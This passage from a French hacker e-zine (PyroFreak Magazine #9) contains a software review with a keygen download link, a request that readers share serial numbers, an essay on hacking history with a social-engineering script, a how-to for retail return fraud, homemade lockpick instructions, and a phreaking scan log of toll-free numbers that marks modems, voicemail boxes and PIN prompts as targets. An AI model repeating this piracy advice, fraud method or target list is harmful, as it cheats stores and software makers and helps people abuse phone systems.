bientôt;) Donc pour terminer : Pours : - Jvous fournis le keygen ;) - Simple - Facile - Efficace - À bcp d'options - etc etc etc Contres : - L'exploit contre le prog - Ya tellement d'options que des fois tu sais pu où trouver ce que tu cher- ches N.B. : Pour le keygen : www.pyrofreak.org/pc_g62kg.zip Pour ceux qui sont en MODEM CABLE ou tout autre connection rapide ou whatever même modem téléphonique mettez dans les options (Advanced) le Receive Buffer au max soit : 65535 bytes parce que sinon, vous recevrez po vite vite :( Genius 2.7 et 3(le 3 étant encore en beta) (+- 1.08 Mb pour la v. 2.7 et 1.21 Mo pour la 3 beta 4) ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ http://www.indiesoft.com/ Bon je sais, il a deja eu un article la dessus... mais bon ca aussi j'en parle souvent sur le channel pis il y a pas grand monde qui save de quoi je parle... C'est pour ça que j'en parle... en plus que c'est quasiment un outil indispensable. Donc c'est un prog qu'on pourrais appeler un multi-programme ;)))) Parce que il fait BEN BEN BEN BEN BEN des affaires. En plus (c'est ce que dit le site et je le crois) il prend full pas de cpu environ seulement 2% des ressource système. Il occupe pas toute ton bordel de systray comme plusieurs programmes... Il y a plusieurs outils... en voici une courte liste mais pour toute la liste détaillé allez la : http://www.indiesoft.com/genius/features.html - Client FTP, Telnet, Raw HTTP, Finger, etc... - Infos pour voir la météos... - Port scanner, carnet d'adresse, Password generator, détecteur de portscan - ET J'EN PASSE EN ESTIE ;) Donc C'EST UN OSTIE DE MUST !!!!! Pours : - TOUTES !!! YA TOUTES OSTIE :P Contres : (pas vraiment des mauvais commentaires mais bon :P ) - Trop d'affaire... ben oui trop c'est comme pas asser tk moi je trouve pas ca ben grave mais il en a que ca peux perdre ben raide - Dans la v. 3 BETA , jai pas trouver comment personnaliser le menu... tk si vous trouvez comment dites le moi parce que jai pas trouver, dans la 2.7 on pouvais... - STUN CRIS DE SHAREWARE... Il existe un crack pis il est trouvable partout c'Est juste que ca crack pas le prog c un LOADER... c'est à dire que tu clique sur le "crack" pis il load le prog pis ta pas de nags... Mais faut que tu exécutes le loader à chaque fois a place du prog lui même, pis en tk ca le fait chier un peu le prog (2.7) Parce que pour la v. 3 à date ta même pas besoin de t'enregistrer tk... Moi jai pas de nags... si quelqu'un s'enregistre (le card ou whatever) Ben ca serait kewl de donner votre # de série et name aux monde ... genre sur le bbs ;) Donc c'est tout pour l'instant... si vous avez des questions ben vous pouvez me retrouver sur l'irc ou ben par email : webmaster@pyrofreak.org ou dark@pyrofreak.org ca revien a même affaire ;)))) ADVICE: Essayer ces progs ;) ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |8-HACKing Millenium |(X) Phreak ( ) Hack ( ) Autres '.__________Par Karyu ________ _____________ karyu@pyrofreak.org __ ___ .-------------------------------. | Status du Document | `-------------------------------' Ce document va faire une petite restropective sur le mouvement hack qui a eu lieu un 'tit peu partout dans le monde... Une sorte de resumé de l'histoire du premier millenaire du Hack. .------------------. | Let's Start ! | `------------------' Vous avez surment entendu parler de l'histoire de Kevin Mitnick, comment ca non ? Bon je resume son aventure. Kevin fait partit de ce que l'on appelle, l'ELITE (ou ELEET, ou 3l337, ou .... bref) de l'Undeground Informatique. Ce dernier a à son actif un tres grand nombre de systemes crackés ! Vous lui filez une calculatrice programmable avec un systeme IR (Infra-Rouge), et il vous en fait une clef de voiture ! Bref c'est un GENIE ! Mais bon, comme tout genie, il a pris la grosse tete, et pis il s'est fait attrapé, bref... Ensuite à suivit une grande médiatisation de sa cause ! Kevin Mitnick par-ci, Kevin Mitnick par la ! Un Hacker ? Ca doit pas être Discret ? HUm oui mais pas quand la justice americaine, veut en faire un exemple ! Ca fait froid dans le dos quand on sait que Kevin a été mis en prison depuis maintenant 4 ans et 10 mois, arf une peine aussi lourde qu'un violeur/assassin de fillettes ! Arf il ne sort qu'en janvier 2000, donc c'est bientot tout ca ! ;))) C'est la ou l'on voit les limites de la justice !! Pour calmer les gens a hacker, ils punissent sévàrement, mais pour cal- mer les salauds qui agressent les gens physiquement ils n'sont pas capable de depenser des fortunes pour stoper ca ! Oui mais c'est quoi la différence entre un bandit normal et un cyber-bandit ? He ben le Cyber-Bandit coûte cher en dégat (si il y a) alors qu'un bandit minable coute cher juste a la personne agressée ! Mais le mouvement Hack n'existe pas depuis Mitnick, il existe bien avant ! Et je vais essayer d'en refaire l'historique à travers ce jolis docu- ment que j'ai ecris expres pour le numero du second millenaire de PyroFREAK! Deja le Hack c'est quoi ? Vous allez me dire que c'est du piratage informatique, oui c'est vrai, mais ce n'est pas que ca. A l'origine, un Hacker c'est une personne qui fait de la bidouille informatique avec ce qu'il a: ses documents, ses outils, ses 10 doigts, et son cerveau. La deja on voit qu'un Hacker a toujours cherche a apprendre tout seul ! La curiosite et la soif de connaissances sont toujours au rendez-vous a l'heure actuel chez les Hackers. Mais au fait pourquoi le mouvement Hack a t-il debute ? A votre avis ? He ben parce que c'est comme ca ! Non j'deconne ;)))... Au debut, le jour ou on a relie les ordinateurs entre eux via le reseau ARPANET (l'ancetre d'Internet) he ben il n'y avait pas grand chose comme securite, sauf pour l'armee ! Et les ordinateurs des universitaires etaient relies au reseau ARPANET tout comme L'Armee US ! Au depart ARPANET a etait cree pour communiquer en toute securite entre bases militaires US, et ceci au depis de l'ex URSS... Bref ARPANET a etait cree pendant la guerre froide (1969): ARPANET la reponse americaine au Spoutnik des russes... et ce fut le debut de tout ! Les universitaires avaient une liaison a l'ARPANET, pourquoi ? He ben pour echanger des connaissances entre universites ! Oui et les connaissances c'est quoi ? He ben ce sont des informations, et comme un Hacker est avide d'informations, he ben certains universitaires ont cherches a aller plus loins dans leur recherche, et notamment en cherchant a obtenir des informations des systemes informatiques de l'armee US ! Et ce fut le debut du HACKING ! Au depart, il n'existait pas windows, UniX etait Le Systeme reseau de reference ! Donc c'est pour cela, que le Hacker faisait et fait toujours aujourd'hui, ses armes avec UniX (et tout recemment LinuX)... UniX a ete cree par AT&T afin de pouvoir installer des serveurs, mais bon ce n'etait que le debut d'UniX et de l'exploitation de serveurs, donc tout ce qui concernait le Hacking he ben c'etait tout con a faire ! A cette epoque le Hack d'un systeme etait aussi simple que d'entrer dans une boulangerie, du moins si vous connaissiez les commandes UniX. Avant Internet n'existait pas, alors comment faisaient les Hackers pour pirater les systemes de l'armee ? He ben par MODEM ! Arf... ******************** ATZ OK ATDT01456688999333 HP-UX server.usarmy.mil.gov B.10.20 A 9000/826 (ttyp1) login: +++ ATH0 ******************** Bref tout ca se passait par Modem, et comment qu'ils faisaient les Hackers pour obtenir les numeros de Modem ??? He ben par SOCIAL ENGENEERING ! ******************** VICTIME: "Allo bonjour, Norman de la securite" HACKER: "Oui bonjour ici Calvin le comptable du pole production... Vous vous connaissez en informatique ?" VICTIME: "heuuuuuh oui ?" HACKER: "Bon je vous explique mon disque dur Seagate 6.4Go DMA66 de mon portable a cramé, et j'aimerais bien récupérer mes fiches que j'ai laissé sur le serveur, et comme j'ai un compte rendu a faire a Mr Le Boss pour demain matin, he ben j'aimerais bien finir vite mon travail, vous connaissez les techniques Nipon des Japonais ? J'aimerais pas qu'il m'fasse faire ARAKIRI" VICTIME: "huhuhhhuhhu" HACKER: "Alors pourriez vous me donner un numero de modem d'un ordinateur ? Vous savez c'est un 'tit boitier qui se branche a l'ordinateur et qui doit normalement etre connecte ?" VICTIME: "oui j'ai trouve alors c'est le : 013131545464464444646" ******************** Ouaip ouaip, et par la meme occasion on en profitait pour recuperer un mot de passe ! ;)) Bah a l'epoque on n'se souciait pas des problemes de piratages informatiques, surtout que l'on n'etait pas au courant si on n's'y connaissait pas en informatique ! Combien de fois j'ai pu recuperer un login et un mot de passe par Social Eng. ? Bref a cette epoque le Hack etait un art a part entiere ! Ou tout se faisait sans trops de difficulte... Il n'y avait tellement pas trops de difficulte que 80% des cas de Hack d'entreprise, etaient des Hacks realises en interne ! Carrement par un employe de l'entreprise ! C'est d'ailleurs toujours le cas aujourd'hui... Mais ca c'est une autre histoire. Apres au fure et a mesure des temps les techniques de securites s'ameliorairent, et celles des Hackers aussi ! Pourquoi cacher des informations se demandaient les Hackers ! Le but premier des Hackers reste toujours le meme, je ne me cesse de le repeter, mais ce but est celui d'apprendre, et ceci en etant curieux ! Alors si on essaie de nous cacher quelque chose, c'est parce qu'il y a quelque chose d'interressant a apprendre... Il ne faut pas mettre les Hackers dans la lignee des Criminels, qui eux ont appris a Detruire, et non a Construire ! Mais bon, on ne va pas polimiquer dessus je ne suis pas la pour ca. Et ce n'est qu'a partir de 1980, que le Hack a grande echelle commenca... En cette annee le protocole TCP/IP a vu son elaboration presque complete, ce dernier a ete cree pour relier 2 reseaux: ARPANET et CSNET, et les deux reseaux reunis formerent "l'inter-network connection", l'internet que l'on connait aujourd'hui. A cette epoque il n'y avait que 213 ordinateurs de connectes... (sources: http://histoire.info.online.fr/net.html)... Et comme le TCP/IP etait en developpement il y avait bien des bugs ! Et pis ce sont ces bugs que les Hackers exploitairent ! Ha on voulait s'faire un truc propre, mais on est arrive quand meme a s'faire un truc no secure, mais bon faut pas non plus dire qu'il n'fonctionne pas ! ;) Mais y a des bugs quand meme exploitables ! Donc l'annee 1980 fut celle de l'apparition du TCP/IP qui amena une nouvelle vie aux Hackers, celle des bugs a exploiter. Et ce fut le debut des apparitions d'IP Spoofing, de sniffage de reseau, bref de toutes les techniques inimaginables ! Le systeme UniX a du meme se mettre a jour afin de profiter du TCP/IP, et ceci pour proposer des services comme le FTP, le HTTP, et le TELNET ! Yeaaaaaah, l'apparition du WEB commenca aussi a cette epoque... Et l'ouverture au monde des entreprises, amena egalement les Hackers sur le NET ! La guerre des Sysop vs les Hackers a ete lancee ! On ne peut oublier de citer les classiques cinematographiques qui sont sortis a cette epoque, comme DARYL, le petit garcon ultra doue, un Genie hors du commun, capable de piloter un avion furtif americain sans meme avoir pris des cours avant ! Ensuite LE Film CULTE => WARGAMES <= qui montre un peu qu'avec un modem on peut s'amuser ;)))) Je vous conseille de voire ou revoire ces films ! Sinon un 'tit peu plus tard apparaissa un autre film dont le titre est assez revelateur: HACKERS, dans ce film assez sympas, on voit plusieurs techniques de Hack que j'ai mentionne dans mon article, mais bon comme il faut pas que ca soit trops technique pour que les gens puissent comprendre on voit les gens se balader dans les disques durs via un monde virtuel ;)) arf une sorte de The Cobaye ? ;))))) Revenons un peu a nos moutons. Donc ce fut en 1980 que le Hacking a vu son evolution s'accellerer avec l'apparition de nouveaux outils, de nouvelles docs, et de nouveaux materiels !!!! OUI ! De nouvelles becanes vurent le jour, comme le MACintosh ! On a vu tout pleins de Hackers utiliser des Apple II ! Bah OUI, la firme de Steve Jobs a bel et bien etait adoptee par les Hackers de cette epoque (j'm'en rappelle, j'avais un poster de l'Apple II, il a etait pris en photo tout demonte, j'en revais d'en avoir un) ! Peace & Love ce fut... En paralelle le phreaking aussi etait en expansion a ce moment la, mais je n'm'y connais pas assez dans ce domaine pour l'inclure dans l'historique donc j'en reparlerais peut etre, ou bien un autre le fera a ma place. Mais bon avec un Apple II, a l'epoque il n'y avait pas le TCP/IP d'inclut mais bon y avait d'koi faire du Net pareil vu que le TCP/IP n'etait pas encore standardise mais juste utilisee pour pouvoir realiser la communication entre les reseaux ARPANET et CSNET, mais bon le NET etait plutot chers, donc on hackait via notre modem HAYES 1200bps et on s'infiltrait sur le reseau ARPANET via le serveur dont la securite a ete violee. ;))) ha ce fut la belle epoque, dommage que j'n'avais pas d'ordis a cette epoque, d'facon un ordis ca m'aurait servis a quoi ??? j'avais meme pas l'age d'lire ;))) ahahaha Ha ca l'aurait peut etre fait un Hacker de 2 ans ;))))) Yoooooo... Sinon pendant toute les annees 80, les Hackers ont vu leur forces decuplees, et les Sysop ont vu les attaques triplees !!! Et ce fut le debut du stereotype de l'informaticien moyen: grosses lunettes, boutonneux, replie sur lui meme, insociable, ne parlant jamais a personne, et preferant les ordinateurs aux filles ! Et l'image du Hacker: des lunettes, fumant un petard, des cheveux longs, un style un peu hippy, et discret... arf regardez vous, vous ressemblez a l'une des deux descriptions ? Oui ? He ben ;)))) Durant les 80's de nombreux groupes ont ete forme: l'union fait la force... En effet un Hacker seul ne peu reussir tous les coups ! Et pis a plusieurs cracker un systeme est plus simple. Parmis les membres des groupes, il y avait un Hacker, un Codeur et un Phreaker et un livreur de pizza ;))))) Je peux citer le CCC (Chaos Computer Club) un groupe allemand, 2600 (un fanz americain, plus tourne vers le phreaking), et pis y en a pleins d'autre mais parmis ces groupes ces deux la sont les plus celebres peut etre que j'me trompe mais j'en savais pas ! Veuillez m'excuser si ca a cause des tors a des gens ! Et ce fut le debut d'un nouveau mouvement de Hacking, l'esprit solo du Hacker s'envola, pour laisser place a l'esprit de solidarite entre Hackers. Ce n'est qu'au debut des annees 90 que l'ouverture d'Internet au grand public fut fulgurant ! Et ceci amena un enorme reseau d'echange d'information considerable pour les Hackers ! Pouvant ainsi communiquer entre eux, leur savoir et leur connaissance augmenta plus vite qu'en lisant des livres: on s'instruit plus vite en demandant de l'aide ! De plus les services du genre Newsgroup (qui existaient bien avant tout ca) se sont vu developper ! Les Fanzines aussi on vu un succes enorme aupres de leur lecteurs, essentiellement des Hackers a la recherche des dernieres techniques de Hack ! Bref le HACKER LIT LIT LIT... Et aussi le Hacker devient sociable, et se reunit en troupe, dans des meetings, comme ceux organises par 2600 ! D'ailleurs le prochain meeting H2k (HOPE 2000), j'essaierais d'y etre, et j'essaierais d'y cracher un article dessus, mais tout dependra de mon budget ! ;)))))))) .---------------------. | Links/Da End | `---------------------' Je vous conseillerais d'aller sur les sites suivants: http://pyrofreak.org ;))))))) http://www.ccc.de (le site du Chaos Computer Club) http://www.2600.com (le site de 2600) http://www.kevinmitnick.com (tout sur l'affaire Mitnick) http://www.h2k.net (le site de HOPE 2000) Je pense qu'avec tout ca on a un bon 'tit paquet d'infos, et puis comme ce n'etait qu'un essai d'historique, il doit forcement y avoir des erreurs, mais j'ai tente d'en faire un ! Enfin bon, sinon la seule chose que j'puisse vous dire c'est: Joyeux Noel et Bonne ANNEE 2000 ! Ciao ! A bientot au prochain numero du second millenaire ! KaRyu (karyu@pyrofreak.org) ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |9-Problêmes avec un PSX en installant une modchips. |( ) Phreak ( ) Hack (X) Autres '.__________Par [XTREAM] ________ ______ xtream_18@hotmail.com __ ___ Je suis pas mal nouveau dans le monde du hacking, mais je me débrouille pas si mal :) Tout d'abord il ya quelques mois j'ai voulu commencer a me faire de l'argent de poche en installant des modchips. J'en avais jasé un peu avec mes copains et il yen avait beaucoups d'intéresser, donc des que j'ai eu un peu d'argent je me suis mis a acheter des chips. J'en avais fait venir 6, tout allait bien j'en avais installé 5 et j'avais commencé a rentrer dans mon argent mais rendu au 6e PSX je fit sauter le PSX!!! FUCK!!! J'tais dans marde, j'avais fait simplement un gros 70$ de profits... alors j'ai penssé et repenssé... alors j'ai penssé prendre l'argent pour mes permis de conduires (vous n'etes pas obligé de savoir ou je l'ais pris.. hehe) et j'ai été directement acheter un autre PSX de meme model. Je suis allé au Toys'R'us en acheter un autre de meme model, j'ai inter- changé les motherboards, retourné le PSX au bout de 1h en disant "J'ai branché le PSX comme il faut sur ma TV et rien ne voulait fonctionner" Donc ils m'en ont donné un autre, et je l'ais gardé pour moi meme. Mais si vous voulez vendez le 2e, au prix d'un neuf, si vous n'enlevez pas l'embalage personne ne va vous dire "Yé usagé, vends-le moi moin cher" pcq vous allez en avoir un neuf entre vos mains, moi j'ai fait ca dans un toys'R'us mais vous pouvez surement le faire dans d'autre Magasins. En tk, j'espere que vous en avez appris un petit peu, et je vous conseils de ne pas trop le faire souvent au meme endroits pcq vous allez peut-etre etre soupsonné! en avoir un neuf. NB de Neuro: Vous pouvez faire ca avec beaucoup d'autres affaires. Exemple: Une souris d'ordi ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |10-Locksmithing Part 1 -- Making your homemade lockpicks |( ) Phreak ( ) Hack (X) Autres '.__________Par Mononcle ____ _________ Mononcle@beer.com _ __ ___ Disclaimer: Ce texte a été écrit dans un but informatif seulement. Je me dégage d'absolument toutes responsabilités des gestes qui seront commis par les lecteurs. Blah Blah Blah, ce texte explique seulement l'art du locksmithing et non l'art de voler. Tout d'abord, ceux qui croient qu'ils pourront allez picker une porte sans rien pratiquer apres avoir fini lire cet article, oubliez ca. Ya juste James Bond qui peux ouvrir une porte avec un trombone tout croche en 5 secondes. Pis désoler de vous décevoir mais James Bond c dans un film ! Le locksmithing est un art, si vous pensez que ca va etre cool et que vous allez pouvoir débarrer des maisons sans effort, cet article n'est pas pour vous. C'est comme dans toute, ya toujours des lames qui pensent que ya une bebelle magique pour picker des serrures. Oui ca existe, ca s'appelle une crowbar :P So here's the shit : Dans cette premiere partie, je vais vous montrer comment fabriquer des bon lockpicks. Vous pouvez en acheter un set pour genre 15$ US, mais pour moi, le trip du locksmithing s'est de se faire ses propres outils. Il y a une grande variété de matériaux pour fabriquer des picks, leur principale qualités doivent etre la souplesse,leur rigidité et leur minceur. Surtout pour le raking, il vous faudra des picks tres résistants. Les matériaux que j'aime le plus sont les lames de scies à metal (99 cents) et les tites broches des balayeuses de rue (gratos). Ces deux matériaux sont extremement flexibles et resistants. Personellement, j'utilise un outil du genre Dremel (probablement le best pour faire ca). Vous pouvez peut-etre aussi utiliser une tour a poncer ou ben une lime si vous etes patients ;). Si vous n'avez pas de dremel, une broche de blayeuse de rue sera mieux parce que vous allez avoir moins de gossage a faire. Bon, pour commencer il vous faut absolument le diamond pick, c'est le plus utile dans toute votre set. Le bout de votre diamond pick devrait ressembler à ca : __________/\ ------------ Scusez mes talents en ASCII là mais vous voyez que c'est un coté pointu et un coté plate. Premièrement, dessinez la shape de votre pick sur votre materiel et la découper. Pour cette étape, j'utilise la lame rotative de mon Dremel et coupe le plus gros autour de la ligne que j'ai tracé. La règle a respecter est : coupe pas SUR la ligne. Apres, prenez votre outil pour limer et faites la finition. Faites attention pour pas limer trop loin, touchez pas à la ligne que vous vous étiez faite. Sinon ca riske de pu ressembler à ce que vous vouliez pis vous allez avoir perdu votre temps et etre en criss paske ca prends genre une demi-heure a faire (avec mon dremel) :P Note : Si vous prenez de koi d'électrique pour couper et limer votre pick, allez pas trop vite. Parce que si le métal chauffe trop et que ca devient bleu, votre pick vaudra pu grand chose, y va perdre de la force. Pis criss, mettez de LUNETTES ! C pas une joke, sérieux ca fait mal en coliss un boute de fer dans l'oeil. Apres que vous aurez un diamond pick, y vous manque une barre de tension (tension wrench) pour commencer à pratiquer. Pour ca, vous pouvez encore vous servir des memes matériaux que pour un pick. Vous avez juste a lui donner une shape qui ressemble à ca : | ______________________| ----------------------- Ooh shit, celui la est pire je pense =) Si vous prenez une broche de balayeuse de rue, vous allez vous rendre compte que ca casse quand vous la pliez a 90 degrés. Pour la plier, je prends une torche au propane, je chauffe le boute jusqu'à ce qu'il devienne rouge et je me dépeche de le plier avec des pinces. Apres quelques essais, vous allez avoir de koi de popire et aussi resistant qu'avant qu'il soit plié. Anyway, quand vous allez comprendre le principe, vous allez comprendre quelle forme y vous faut. Bon, la je vous donne le stock de base, mais y'existe plein d'autre sortes de barre de tension. Asteur, vous pouvez aussi faire d'autres picks utiles comme le double-diamond, le snake, ball, double-ball etc. Genre si vous en faite un ou deux par semaine, ca prendra pas de temps que vous allez avoir un set qui a de l'allure. Vous pouvez faire aussi des diamond picks de différentes grosseurs, c'est toujours utile. Voilà pour la première partie sur le locksmithing. Dans la deuxième, je vous montrerez comment se faire un practice lock. C'est mieux de se pratiquer avec ca qu'avec sa porte de maison dehors à -25 C ;). Pis dans les autres je devrais parler des techniques de lockpicking. Bon locksmithing à ceux que ca intéresse, pi je le répète encore, c un art et non une méthode magique. Brought to you by : Mononcle - Mononcle@beer.com NB de Neuro: http://www.lysator.liu.se/mit-guide/mit-guide.html Guide Complet de lookpicking (anglais) ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 |11-Logs de scan (Phreak) |(X) Phreak ( ) Hack ( ) Autres '.__________Par Neuro ________ ______ neuro@pyrofreak.org __ ___ Hello all, pour ce numéro de PyroFreak j'ai décidé de vous faire part de quelques découvertes que j'ai fais en skannant dans les 1-800. J'ai enlever les numéros invalide de la liste, vu que j'pense pas que ca rapporte quelque chose à quelqu'un de savoir cela. Les numéros qui vont suivrent ont tous été scanner à la main, il y a du monde qui vont me dire: Ca du te prendre du temps, moi je répond oui, mais j'aime ca, pis j'trouve ca plus éfficace, mais bon, chacun ces techniques. Je donne pas une descrip- tion des numéros très détaillés, parce que j'ai pas vraiment de temps a perdre. Conseil pour scanner: Une bonne gorger de biere entre chaque numéro composé , ca te donne un peu de PUSH, donc ca se fais mieux! Nb: Je peux avoir fais des erreurs. Ces numéros ont été scanner a la main dans le code régional 450 Cie=Compagnie OQP= Occupé 1-888-5XX-2255: (CALL) 1-888-503-2255:Good Bye 1-888-504-2255:Modem 1-888-505-2255:Voix (Un cris de singlé qui parle) 1-888-508-2255:Cie VMS 1-888-510-2255:Lag Vegas Medical Group VMS 1-888-511-2255:Une pub pour un 1-900-344-4414 1-888-512-2255:OQP 1-888-513-2255:Bienvenue chez BELL *Sympatico Haute Vitesse* 1-888-514-2255:Cie VMS 1-888-515-2255:Cie VMS téléréponse BEll Canada 1-888-516-2255:Welcome to internet!!! Enter your number... 1-888-519-2255:Cie (compagnie de sécurité) 1-888-522-2255:Cie , bla bla , good bye 1-888-523-2255:Cie VMS 1-888-526-2255:Sonne 2 coups, ensuite tonalité 1-888-530-2255:Ball team : Enter your 3 digits code.. 1-888-538-2255:Cie VMS BOX:11-12-13-14-25 1-888-539-2255:Telephone Bank service... Access to your account 1-888-543-2255:Pas de réponse 1-888-544-2255:First Amerique Bank 1-888-545-2255:First Amerique Bank 1-888-550-2255:Cie Vmb Audix (La meme box que le 54 et 59) 1-888-552-2255:Cie, bla bla, Good Bye 1-888-553-2255:Tonalité 1-888-554-2255:Vmb Audix (La meme box que le 50 et 59) 1-888-556-2255:Cie 1VMB 1-888-559-2255:Vmb Audix (La meme box que le 50 et 54) 1-888-565-2255:Please Enter your for digits pine. 1-888-575-2255:FAX 1-888-576-2255:Cie 1-888-586-2255:Pagett (Numerik Message) 1-888-587-2255:Pagett (Numerik Message) 1-888-589-2255:Pagett (Numerik Message) 1-888-595-2255:OQP 1-800-262-22XX: 1-800-262-2205-Enter your Four digits pin 1-800-262-2206-VOIX 1-800-262-2208-Enter your Four digits pin 1-800-262-2214-Cie 1VMB 1-800-262-2215-1VMB 1-800-262-2216-Cie 1VMB 1-800-262-2222-OQP 1-800-262-2223-ABC home video Cie (Order) 1-800-262-2226-Cie Vmb BOX:6000-6001 1-800-262-2230-Cris de langue de fou (Japonnais ou autres) 1-800-262-2241-Cie Vmb *t 2003 1-800-262-2243-Cie Vmb 1-800-262-2244-Voice mail system (6159) Pas en service 1-800-262-2247-At&t Easy Reach 1-800 1-800-262-2248-1Vmb 1-800-262-2250-OQP 1-800-262-2251-Fax/modem 1-800-262-2252-OQP 1-800-262-2253-1Vmb Intéressant 1-800-262-2266-Cie VMB 6001 1-800-262-2268-Un ancien service de long distance 1-800-262-2274-Information line Visa 1-800-262-2275-Cie UFS 1vmb 1-800-262-2276-Cie VMB 1-800-262-2277-Cie BMA 1-800-262-2278-Tonalité 1-800-262-2281-Cie 1Vmb 1-800-262-2282-Cie vmb 1-800-262-2283-1VMB DLA PURE MARDE 1-800-262-2284-Cie Vmb 1-800-262-2285-Cie Royal Bank... ... 1-800-262-2291-At&t Easy Reach 1-800 1-800-262-2295-sonne et déconnecte , si tu pitonne, une bonne femme te répond 1-800-262-2298-Cie 1vmb 1-800-262-2299-Cie Vmb 1-800-545-99XX: 1-800-545-9908-New Cristie digital System (vmb) 100-118 1-800-545-9911-Aucune Réponse 1-800-545-9914-At&t Enter access code Now 1-800-545-9920-Number Service "HIZ" 1-800-545-9924-Apres 4 coups (My and Mom cie) 1-800-545-9925-Ca Répondu 1-800-545-9926-Apres 5 coups (cie) 1-800-545-9927-Systeme avec options(Text message, vocal message, numérique..) 1-800-545-9928-Simple Vmb 1-800-545-9930-Systeme avec options(Text message, vocal message, numérique..) 1-800-545-9932-Joe Pagett 1-800-545-9933-cie (vmb) 1-800-545-9934-cie 1-800-545-9935-Systeme avec options(Text message, vocal message, numérique..) 1-800-545-9936-Alf... solution goupe Vmb 1-800-545-9937-Aucune Réponse 1-800-545-9938-Systeme avec options(Text message, vocal message, numérique..) 1-800-545-9939-Aucune Réponse 1-800-545-9940-Aucune Réponse 1-800-545-9941-Ca Répondu (cie) 1-800-545-9945-Vmbs de cie apres 4 coups 1-800-545-9948-Vmb apres 5 coups 1-800-545-9949-New Groupe (Cie) 2 Digits pour l'extension 1-800-545-9951-At&t Enter access code Now 1-800-545-9952-cie a plusieurs langues, une cris de langue inconprenable 1-800-545-9954-at&t universal ..... Rien d'intéressant 1-800-545-9956-Sonne un coup, changement de tonalité (Possibilité de Pbx) 1-800-545-9958-Occupé 1-800-545-9961-Ca répondu (cie) 1-800-545-9966-At&t Enter access code Now 1-800-545-9967-Ca répondu 1-800-545-9969-Ligne de cul!!! SEX SEX SEX SEX SEX :))))))))))))))))))))))) 1-800-545-9970-Myler cie Vmbs 1-800-545-9972-Cie Vmbs 1-800-545-9973-Modem/fax 1-800-545-9978-Cie Vmbs 1-800-545-9979-At&t Enter access code Now 1-800-545-9981-PLease Enter your four Digits 1-800-545-9982-Ca répondu 1-800-545-9983-At&t Enter access code Now 1-800-545-9984-Modem/fax 1-800-545-9985-Pas de réponse 1-800-545-9986-Modem/fax 1-800-545-9987-Modem/fax 1-800-545-9988-cie Vmbs 1-800-545-9990-cie 1-800-545-9992-cie Simple VMB 1-800-545-9993-At&t Enter access code Now 1-800-545-9998-Van gard group (Options) 1-800-545-9999-Tonalité fucker des le début 1-800-616-66X X: 1-800-616-6600-Aucune Réponse 1-800-616-6607-Modem 1-800-616-6608-Occupé 1-800-616-6609-Modem 1-800-616-6610-Modem 1-800-616-6611-Sonnerie Spécial-Voix 1-800-616-6613-cie 1-800-616-6617-Simple Vmb 1-800-616-6618-Voix 1-800-616-6621-cie vmbs 1-800-616-6622-Music, SPÉCIAL #1-800-616-6623-cie vmbs 1-800-616-6627-Tonalité vraiment étrange (A faire buzzer:)))) 1-800-616-6628-Occupé 1-800-616-6630-cie vmbs 1-800-616-6631-Voix 1-800-616-6632-At&t Enter access code Now 1-800-616-6633-Tonalité 1-800-616-6634-Modem/fax 1-800-616-6635-Voix 1-800-616-6636-Modem/fax 1-800-616-6637-Voix 1-800-616-6638-Voix 1-800-616-6641-Pas de réponse 1-800-616-6642-Modem 1-800-616-6646-INformation Line Canada.. Simple vmb 1-800-616-6648-At&t Enter access code Now 1-800-616-6649-Pas de réponse 1-800-616-6650-Vmb personnel 1-800-616-6651-Vmb personnel 1-800-616-6652-Please enter your card number? 1-800-616-6654-Vmb personnel 1-800-616-6660-Pas de réponse 1-800-616-6661-tonalité 1-800-616-6663-cie vmbs 1-800-616-6665-cie 1-800-616-6667-Pas de réponse 1-800-616-6670-Pas de réponse 1-800-616-6674-cie vmbs 1-800-616-6675-At&t Enter access code Now 1-800-616-6678-Sprint Canada 1-800-616-6679-Voix 1-800-616-6682-Pagett 1-800-616-6684-Ca sonne meme pas, y se passe rien (Bizzare) (Dead line) 1-800-616-6685-tonalité 1-800-616-6686-Vmb 1-800-616-6687-Boite vocale de bell (cie) 1-800-616-6693-Occupé 1-800-616-6694-Voice mail service is down temporairy 1-800-616-6695-Occupé 1-800-616-6696-Voix cie 1-800-616-6697-Occupé 1-800-884-22XX: 1-800-884-2200-Pas de réponse 1-800-884-2201-OQP 1-800-884-2202-OQP 1-800-884-2203-OQP 1-800-884-2204-OQP 1-800-884-2205-OQP 1-800-884-2206-OQP 1-800-884-2207-Busy 1-800-884-2208-OQP 1-800-884-2209-OQP 1-800-884-2210-OQP 1-800-884-2211-Cie Vmb 1-800-884-2213-Please enter your four digits Pine 1-800-884-2214-Phone Card -Please enter your card now? 1-800-884-2215-Pas de réponse 1-800-884-2217-Fucking tonalité 1-800-884-2218-Fucking tonalité 1-800-884-2221-Dead Line 1-800-884-2222-Modem/fax 1-800-884-2226-Cie vmb 1-800-884-2227-Tonalité fucker 1-800-884-2229-fax/modem 1-800-884-2230-vmb 1-800-884-2233-Columbia House 1-800-884-2235-At&t Easy Reach 800 1-800-884-2237-Cie vmb 1-800-884-2244-Pas de réponse 1-800-884-2246-modem 1-800-884-2248-Ca vaut la peine découter la folle parler, mais sans but! 1-800-884-2252-At&t Easy Reach 800 1-800-884-2255-Pas de réponse 1-800-884-2259-Medical service online.... Vmb 1-800-884-2261-tonalité 1-800-884-2264-At&t Easy Reach 800 1-800-884-2265-oh, la cé buzzant, vraiment buzzant, BUZZZAAANTT (Pbx p-e??) 1-800-884-2266-OQP 1-800-884-2268-OQP 1-800-884-2272-Pas de réponse 1-800-884-2276-Cris, chu tu chanceux a soir, un autre affaire a faire buzzer 1-800-884-2278-Please Enter your for digits Pine? 1-800-884-2281-Sonnerie Spécial 1-800-884-2282-At&t Easy Reach 800 1-800-884-2284-Pas de réponse 1-800-884-2286-fax/modem 1-800-884-2288-Voix, Order 1-800-884-2292-Not available at this time 1-800-884-2296-Office vmb 1-800-884-2299-OQP 1-800-451-11XX: 1-800-451-1101-Cie Vmb 1-800-451-1102-Pagett 1-800-451-1103-OQP 1-800-451-1104-Pas de réponse 1-800-451-1106-OQP 1-800-451-1107-Cie Vmb 1-800-451-1108-At&t Easy Reach 800 1-800-451-1109-Sonnerie, décrochage, sonnerie, décrochage, VOIX 